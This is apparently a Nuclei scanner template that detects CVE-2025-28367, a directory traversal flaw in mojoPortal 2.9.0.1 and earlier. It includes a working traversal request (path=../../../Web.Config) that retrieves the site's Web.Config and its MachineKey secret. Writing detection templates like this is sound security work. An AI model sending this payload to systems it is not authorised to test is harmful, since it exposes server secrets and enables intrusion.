id: CVE-2025-28367

info:
  name: mojoPortal <=2.9.0.1 - Directory Traversal
  author: DhiyaneshDk
  severity: medium
  description: |
    mojoPortal <=2.9.0.1 is vulnerable to Directory Traversal via BetterImageGallery API Controller - ImageHandler Action. An attacker can exploit this vulnerability to access the Web.Config file and obtain the MachineKey.
  reference:
    - https://github.com/i7MEDIA/mojoportal
    - https://www.0xlanks.me/blog/cve-2025-28367-advisory/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-28367
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2025-28367
    cwe-id: CWE-284
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="mojoportal"
  tags: cve,cve2025,mojoportal,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/BetterImageGallery/imagehandler?path=../../../Web.Config"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<machineKey"
          - "<system.web>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202a68432b46ac2850a9da57707048c107742c7446c91e7f5922c342a72ac9645a022100e46d73df01d36a40d2e81f6069f4e30e797f723f0655ee82848648ef045f19e6:922c64590222798bb761d5b6d8e72950